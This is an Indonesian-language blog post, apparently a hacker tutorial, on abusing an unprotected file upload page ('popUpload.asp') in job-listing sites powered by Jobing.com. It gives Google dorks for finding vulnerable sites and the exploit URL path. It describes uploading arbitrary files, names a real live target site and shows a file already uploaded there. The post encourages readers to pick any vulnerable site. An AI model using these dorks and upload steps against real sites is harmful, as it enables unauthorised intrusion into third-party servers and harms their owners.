Hai sobat IT ,, selamat malam ^_^ sehat ? :v
Okeh kali ini saya akan share masih mengenai vulnerability ,, sebelumnya saya ucapkan Arigatougozaimasu untuk nick "vaceFF1337" yang telah memberikan penerangan ,, cie penerangan haha . .
"Exploit Jobing File Upload Vulnerability"
Okeh langsung saja yuk gan cekibrott ^_^ >>
Hal yang pertama seperti biasanya kita akan mengandalkan dork google ^_^
++++++++++++++++++++++++++++++
#Dork: inurl:"popUpload.asp"
#Dork: intext:"Powered by Jobing.com Local Jobs"
#Exploit: http://situstarget/popUpload.asp
+++++++++++++++++++++++++++++++
Langsung saja gan gunakan dorknya ,, pilih situs mana saja yang sekiranya vuln dan masukan exploitnya ^_^.
Jika vuln maka akan muncul seperti ini gan
penampakan :
Setelah itu tinggal klik tombol choose file untuk memilih file agan yang akan di upload ,, kemudian klik tombol upload now untuk mengunduh file agan .
Tunggu hingga proses upload selesai ,, nanti secara otomatis lokasi file kamu akan ditampilkan.
Penampakan :
Nah cukup mudah bukan ? ^_^ mungkin hanya sampai disini perjumpaan kita kali ini ^_^ mohon maaf bila ada kesalahan , wassalam.
Live target : http://www.northarkhr.org/popUpload.asp
Contoh hasil : http://www.northarkhr.org/files/1006/images/pelurukertas.gif
Contoh hasil : http://www.northarkhr.org/files/1006/images/pelurukertas.gif
No comments:
Post a Comment
" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "